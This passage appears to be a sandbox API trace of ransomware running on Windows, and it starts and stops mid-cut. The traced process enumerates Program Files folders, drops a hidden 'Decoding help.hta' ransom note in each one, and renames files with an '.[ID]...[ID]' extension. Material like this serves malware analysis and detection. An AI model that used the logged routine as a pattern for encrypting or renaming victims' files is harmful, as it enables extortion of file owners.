8\\Common7\\IDE\\PrivateAssemblies\\Microsoft.VisualStudio.Tools.Applications.Project.dll") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies\\Microsoft.VisualStudio.Tools.Applications.Project.dll" [0057.629] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies\\Microsoft.VisualStudio.Tools.Applications.Project.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies\\Microsoft.VisualStudio.Tools.Applications.Project.dll") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies\\Microsoft.VisualStudio.Tools.Applications.Project.dll" [0057.629] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies\\Microsoft.VisualStudio.Tools.Applications.Project.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies\\Microsoft.VisualStudio.Tools.Applications.Project.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies\\Microsoft.VisualStudio.Tools.Applications.Project.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0057.629] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies\\Microsoft.VisualStudio.Tools.Applications.Project.dll" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\privateassemblies\\microsoft.visualstudio.tools.applications.project.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies\\Microsoft.VisualStudio.Tools.Applications.Project.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\privateassemblies\\microsoft.visualstudio.tools.applications.project.dll.[id]g9uzrlhjaygpwrm1[id]")) Thread: id = 604 os_tid = 0xdb4 [0048.752] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\*.*", lpFindFileData=0xa4cfd30 | out: lpFindFileData=0xa4cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea1accb, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x228ba44f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d84d0 [0049.291] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.291] FindNextFileW (in: hFindFile=0x5d84d0, lpFindFileData=0xa4cfd30 | out: lpFindFileData=0xa4cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea1accb, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x228ba44f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.291] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.291] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.291] FindNextFileW (in: hFindFile=0x5d84d0, lpFindFileData=0xa4cfd30 | out: lpFindFileData=0xa4cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a39353, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x8eb2501, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x8a39353, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdaorar.dll.mui", cAlternateFileName="")) returned 1 [0049.635] lstrcpyW (in: lpString1=0x10f14ea8, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\*.*" [0049.635] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\*.*") returned 63 [0049.635] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\Decoding help.hta" [0049.635] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\en-us\\decoding help.hta")) returned 0xffffffff [0049.635] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0051.901] WriteFile (in: hFile=0x358, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xa4cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xa4cfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0051.903] CloseHandle (hObject=0x358) returned 1 [0051.903] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0051.903] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msdaorar.dll.mui") returned -1 [0051.903] lstrlenW (lpString="msdaorar.dll.mui") returned 16 [0051.903] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\*.*" [0051.903] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\*.*") returned 63 [0051.903] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\", lpString2="msdaorar.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\msdaorar.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\msdaorar.dll.mui" [0051.903] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\msdaorar.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\msdaorar.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\msdaorar.dll.mui" [0051.903] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\msdaorar.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\msdaorar.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\msdaorar.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0051.903] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\msdaorar.dll.mui" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\en-us\\msdaorar.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\msdaorar.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\en-us\\msdaorar.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0052.485] FindNextFileW (in: hFindFile=0x5d84d0, lpFindFileData=0xa4cfd30 | out: lpFindFileData=0xa4cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a858c5, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x8e65f8f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x8a858c5, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1600, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdasqlr.dll.mui", cAlternateFileName="")) returned 1 [0052.485] lstrcpyW (in: lpString1=0x114950c8, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\*.*" [0052.485] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\*.*") returned 63 [0052.485] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\Decoding help.hta" [0052.485] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\en-us\\decoding help.hta")) returned 0x1 [0052.485] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msdasqlr.dll.mui") returned -1 [0052.485] lstrlenW (lpString="msdasqlr.dll.mui") returned 16 [0052.485] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\*.*" [0052.485] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\*.*") returned 63 [0052.485] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\", lpString2="msdasqlr.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui" [0052.485] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui" [0052.485] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0052.485] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\en-us\\msdasqlr.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\en-us\\msdasqlr.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0052.486] FindNextFileW (in: hFindFile=0x5d84d0, lpFindFileData=0xa4cfd30 | out: lpFindFileData=0xa4cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a5395f, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x9e34029, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x9a5395f, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xba00, dwReserved0=0x0, dwReserved1=0x0, cFileName="oledb32r.dll.mui", cAlternateFileName="")) returned 1 [0052.486] lstrcpyW (in: lpString1=0x114950c8, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\*.*" [0052.486] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\*.*") returned 63 [0052.486] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\Decoding help.hta" [0052.486] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\en-us\\decoding help.hta")) returned 0x1 [0052.486] lstrcmpiW (lpString1="Decoding help.hta", lpString2="oledb32r.dll.mui") returned -1 [0052.486] lstrlenW (lpString="oledb32r.dll.mui") returned 16 [0052.486] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\*.*" [0052.486] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\*.*") returned 63 [0052.486] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\", lpString2="oledb32r.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui" [0052.486] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui" [0052.486] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0052.486] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\en-us\\oledb32r.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\en-us\\oledb32r.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0052.486] FindNextFileW (in: hFindFile=0x5d84d0, lpFindFileData=0xa4cfd30 | out: lpFindFileData=0xa4cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8aabb7e, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x8e65f8f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x8aabb7e, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xac00, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqloledb.rll.mui", cAlternateFileName="")) returned 1 [0052.486] lstrcpyW (in: lpString1=0x114950c8, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\*.*" [0052.486] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\*.*") returned 63 [0052.486] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\Decoding help.hta" [0052.487] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\en-us\\decoding help.hta")) returned 0x1 [0052.487] lstrcmpiW (lpString1="Decoding help.hta", lpString2="sqloledb.rll.mui") returned -1 [0052.487] lstrlenW (lpString="sqloledb.rll.mui") returned 16 [0052.487] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\*.*" [0052.487] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\*.*") returned 63 [0052.487] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\", lpString2="sqloledb.rll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui" [0052.487] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui" [0052.487] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0052.487] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\en-us\\sqloledb.rll.mui"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\en-us\\sqloledb.rll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0052.487] FindNextFileW (in: hFindFile=0x5d84d0, lpFindFileData=0xa4cfd30 | out: lpFindFileData=0xa4cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa260c65, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xa5a884b, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xa260c65, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4600, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlxmlx.rll.mui", cAlternateFileName="")) returned 1 [0052.487] lstrcpyW (in: lpString1=0x114950c8, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\*.*" [0052.487] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\*.*") returned 63 [0052.487] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\Decoding help.hta" [0052.487] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\en-us\\decoding help.hta")) returned 0x1 [0052.487] lstrcmpiW (lpString1="Decoding help.hta", lpString2="sqlxmlx.rll.mui") returned -1 [0052.487] lstrlenW (lpString="sqlxmlx.rll.mui") returned 15 [0052.487] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\*.*" [0052.487] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\*.*") returned 63 [0052.487] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\", lpString2="sqlxmlx.rll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui" [0052.487] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui" [0052.487] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0052.488] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\en-us\\sqlxmlx.rll.mui"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\en-us\\sqlxmlx.rll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0052.488] FindNextFileW (in: hFindFile=0x5d84d0, lpFindFileData=0xa4cfd30 | out: lpFindFileData=0xa4cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa260c65, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xa5a884b, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xa260c65, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4600, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlxmlx.rll.mui", cAlternateFileName="")) returned 0 [0052.488] FindClose (in: hFindFile=0x5d84d0 | out: hFindFile=0x5d84d0) returned 1 Thread: id = 605 os_tid = 0xdb8 [0048.761] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\*.*", lpFindFileData=0xa74fd30 | out: lpFindFileData=0xa74fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x274de510, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd6d73d80, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6d73d80, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8710 [0050.572] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0050.572] FindNextFileW (in: hFindFile=0x5d8710, lpFindFileData=0xa74fd30 | out: lpFindFileData=0xa74fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x274de510, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd6d73d80, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6d73d80, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.572] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0050.572] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0050.572] FindNextFileW (in: hFindFile=0x5d8710, lpFindFileData=0xa74fd30 | out: lpFindFileData=0xa74fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5279f530, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd504b000, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd504b000, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0050.572] lstrcmpW (lpString1=".", lpString2="1033") returned -1 [0050.572] lstrcmpW (lpString1="..", lpString2="1033") returned -1 [0050.572] lstrcmpiW (lpString1="windows", lpString2="1033") returned 1 [0050.575] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft 